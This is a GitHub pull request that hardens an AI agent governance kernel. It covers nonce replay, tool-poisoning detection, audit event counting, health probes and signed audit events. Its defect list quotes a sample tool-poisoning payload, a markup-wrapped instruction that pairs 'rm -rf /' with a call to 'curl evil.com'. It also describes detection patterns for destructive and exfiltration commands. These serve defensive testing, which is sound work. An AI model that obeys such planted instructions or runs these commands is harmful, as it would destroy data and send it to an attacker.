Skip to content

fix(agent-os): harden replay, tool-poisoning, audit accounting, health, signed CloudEvents#3247

Draft
liamcrumm wants to merge 2 commits into
mainfrom
fix/agent-os-security-integrity
Draft

fix(agent-os): harden replay, tool-poisoning, audit accounting, health, signed CloudEvents#3247
liamcrumm wants to merge 2 commits into
mainfrom
fix/agent-os-security-integrity

Conversation

@liamcrumm

Copy link
Copy Markdown
Contributor

Summary

Close five agent_os security and integrity gaps so the kernel can be trusted to gate and record untrusted activity. Every defect ships a test that fails before the change and passes after, and each evidence repro flips.

Problem

agent_os had a cluster of governance holes: replay protection that expired early, a memory guard blind to markup-wrapped tool poisoning, an audit event processor that lost events without counting them, a health probe that reported HEALTHY while verifying nothing, and audit events that were plain unsigned dicts rather than signed CloudEvents.

Changes

File What changed
mcp_protocols.py InMemoryNonceStore.add evicts expired-first and raises NonceStoreCapacityError instead of evicting an in-window nonce; new error type; docstrings updated
mcp_message_signer.py verify_message surfaces capacity saturation as a fail-closed verification failure; cache-size docstring corrected
memory_guard.py New markup-instruction, destructive-command and exfil pattern sets plus AlertType.TOOL_POISONING; MEDIUM alone, HIGH when paired
event_sink.py Lock-guarded submitted/delivered/failed counters (reconcile with dropped); GovernanceEvent.to_cloudevent(); GovernanceEventSigner; StdoutGovernanceSink and OTLPGovernanceSink
integrations/health.py Auto-register built-ins (register_builtins flag), empty report aggregates to UNHEALTHY, audit check reports DEGRADED with no backend
__init__.py Export NonceStoreCapacityError, GovernanceEventSigner, StdoutGovernanceSink, OTLPGovernanceSink
tests (6 files) New regression tests per defect; rewrote tests that encoded the vulnerable behavior

Defects and repro flips

  1. Nonce-cache replay count-eviction dropped in-window nonces, so a replay verified valid again. Now fail-closed at capacity. cache=2, verify 4 msgs, re-verify msg0 -> is_valid=False.
  2. Tool-poisoning gap <important>...rm -rf / and curl evil.com</important> was allowed=True, 0 alerts. Now allowed=False with a HIGH TOOL_POISONING alert; benign prose stays allowed.
  3. Silent audit loss events dispatched to a FAILURE or circuit-open sink were drained but counted nowhere. Now submitted == delivered + failed + dropped; a FAILURE sink yields failed=50, not silent loss.
  4. False-healthy probe HealthChecker().check_health() was empty and HEALTHY. Now built-ins auto-register, empty aggregates UNHEALTHY, and the audit check is DEGRADED without a backend.
  5. Unsigned audit to_dict() lacked id/source/type/specversion and a signature. New to_cloudevent() (ADR-0021, AUDIT-COMPLIANCE-1.0 section 20.4) plus HMAC signer (signature covers the algorithm attribute); tamper of data or algorithm fails verification.

Design notes and scope

  • Nonce store fails closed at capacity rather than growing unbounded (a pure soft cap would make max_entries a non-bound). Availability tradeoff under saturation is documented; operators raise max_nonce_cache_size or shorten the replay window.
  • to_dict() is intentionally unchanged for AuditBackendSinkAdapter back-compat; the CloudEvents form is the export path per the documented method name to_cloudevent().
  • Health behavior change: the built-in server /health now reports degraded (audit backend not wired into the checker) instead of a false healthy. Readiness stays green because DEGRADED is still ready.
  • Signing key management is out of scope; sinks take a caller-provided signer. The key is never logged.

Testing

  • ruff check --select E,F,W --ignore E501 clean on all changed files.
  • Targeted pytest for the four touched suites plus consumers (test_server, test_optional_deps_integration, test_core_features, test_spec_audit_compliance_conformance) passes; +21 new tests.
  • All five evidence repros flip before vs after.
  • Full agent-os suite: the 20 pre-existing test_autogen_hooks failures and the agent_sre-missing collection error reproduce on a clean tree and are unrelated to this change.

…h, signed CloudEvents

Close five agent_os security and integrity gaps so the kernel can be trusted
to gate and record untrusted activity. Each defect ships with a test that fails
before the change and passes after.

1. Nonce-cache replay (mcp_protocols / mcp_message_signer). InMemoryNonceStore
   evicted by count via OrderedDict.popitem, dropping nonces still inside the
   replay window and letting messages replay as valid. Eviction is now
   expired-first and fails closed at capacity (NonceStoreCapacityError) rather
   than evicting an in-window nonce, keeping max_entries a real bound.

2. Tool-poisoning coverage (memory_guard). validate_write missed markup-wrapped
   standing instructions carrying destructive shell commands and exfil. Added
   markup-tag, destructive-command and exfil pattern sets and a TOOL_POISONING
   alert. Tags are MEDIUM alone and HIGH when paired with a dangerous payload,
   so benign prose (including a bare curl mention) stays allowed.

3. Event accounting (event_sink.GovernanceEventProcessor). The processor had no
   delivered counter and lost events dispatched to a failing or circuit-open
   sink without counting them. Added lock-guarded submitted, delivered and
   failed counters so submitted == delivered + failed + dropped after shutdown.

4. False-healthy probe (integrations/health). A fresh HealthChecker reported
   HEALTHY with zero components and the audit built-in was an unconditional
   HEALTHY stub. Built-ins now auto-register (register_builtins flag), an empty
   report aggregates to UNHEALTHY, and the audit check reports DEGRADED when no
   backend is configured.

5. Signed CloudEvents (event_sink). GovernanceEvent gains to_cloudevent()
   (CloudEvents 1.0 per ADR-0021 and AUDIT-COMPLIANCE-1.0 section 20.4) plus an
   HMAC GovernanceEventSigner whose signature covers the algorithm attribute,
   and StdoutGovernanceSink and OTLPGovernanceSink. to_dict() is unchanged for
   AuditBackendSinkAdapter back-compat.

Validation: ruff check --select E,F,W --ignore E501 clean on changed files;
targeted pytest for the four touched suites plus consumers passes; all five
repros flip.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
Signed-off-by: liamcrumm <liamcrumm@microsoft.com>
@github-actions

github-actions Bot commented Jul 2, 2026

Copy link
Copy Markdown

PR Review Summary

Check Status Details
🔍 Code Review ⚠️ Missing No current-run comment
🛡️ Security Scan ⚠️ Missing No current-run comment
🔄 Breaking Changes ⚠️ Missing No current-run comment
📝 Docs Sync ⚠️ Missing No current-run comment
🧪 Test Coverage ⚠️ Missing No current-run comment

Verdict: ⚠️ AI review incomplete; ready for human review

AI review comments are untrusted advisory output. The summary reports workflow-generated completion status only, not model-authored pass/fail claims.

@github-actions github-actions Bot added the tests label Jul 2, 2026
@github-actions

github-actions Bot commented Jul 2, 2026

Copy link
Copy Markdown

Dependency Review

✅ No vulnerabilities or license issues or OpenSSF Scorecard issues found.

Scanned Files

None

@github-actions github-actions Bot added the size/XL Extra large PR (500+ lines) label Jul 2, 2026
checker = HealthChecker(version="test")

class _AuditBackend:
def write(self, entry) -> None: ...

class _AuditBackend:
def write(self, entry) -> None: ...
def flush(self) -> None: ...
…, health, docs)

Remediations from a multi-lens deep code review of the security hardening:

- event_sink: spread GovernanceEvent.attributes BEFORE authoritative fields in
  to_cloudevent() so a free-form attribute key can no longer shadow the real
  agent_id/decision/action inside a validly-signed CloudEvent (audit integrity).
- event_sink: CloudEvents type namespace changed from ai.agentmesh.* to
  ai.agentos.* — Agent OS is a distinct producer from Agent Mesh (ADR-0021
  reserves ai.agentmesh.* for the mesh producer); stop inventing mesh-namespaced
  types not in AUDIT-COMPLIANCE 20.4.
- event_sink: signer/sinks serialize with default=str (matches AuditEntry.to_json)
  so a non-JSON-native attribute value no longer aborts the whole batch; derived
  CloudEvents source is percent-encoded.
- event_sink: accounting distinguishes intentional sink DROPPED (bucketed as
  dropped, not failed); OTLPGovernanceSink returns DROPPED (not SUCCESS) when
  OpenTelemetry is absent, and promotes severity/resource/policy_name/session_id
  as searchable OTel metadata alongside the CloudEvent envelope.
- mcp_protocols: nonce retention is inclusive of the exact expiry instant
  (has/cleanup use strict >), matching the verifier's inclusive replay-window
  check, closing a boundary replay at now == expires_at.
- memory_guard: markup tag + a BARE curl/wget is MEDIUM (allowed) not HIGH, to
  stop false-positive blocks of benign tooling runbooks; fork-bomb regex tolerates
  whitespace. Destructive/exfil pairings still block.
- health: removed the unused policy_engine constructor parameter (silently-ignored
  input); documented that the server /health is DEGRADED until a durable audit
  backend is wired.
- docs/spec: CHANGELOG [Unreleased] Security entry; MCP-SECURITY-GATEWAY 7.7/7.9
  now specify capacity fail-closed + inclusive retention; api-reference HealthChecker
  signature and example updated.

Tests: +new regressions for each finding; targeted + conformance suites pass
(381), full agent-os suite unchanged vs baseline (4804 passed; pre-existing
agent_sre/autogen env failures only). ruff clean on changed files.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
Signed-off-by: liamcrumm <liamcrumm@microsoft.com>
@github-actions github-actions Bot added the documentation Improvements or additions to documentation label Jul 2, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

documentation Improvements or additions to documentation size/XL Extra large PR (500+ lines) tests

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant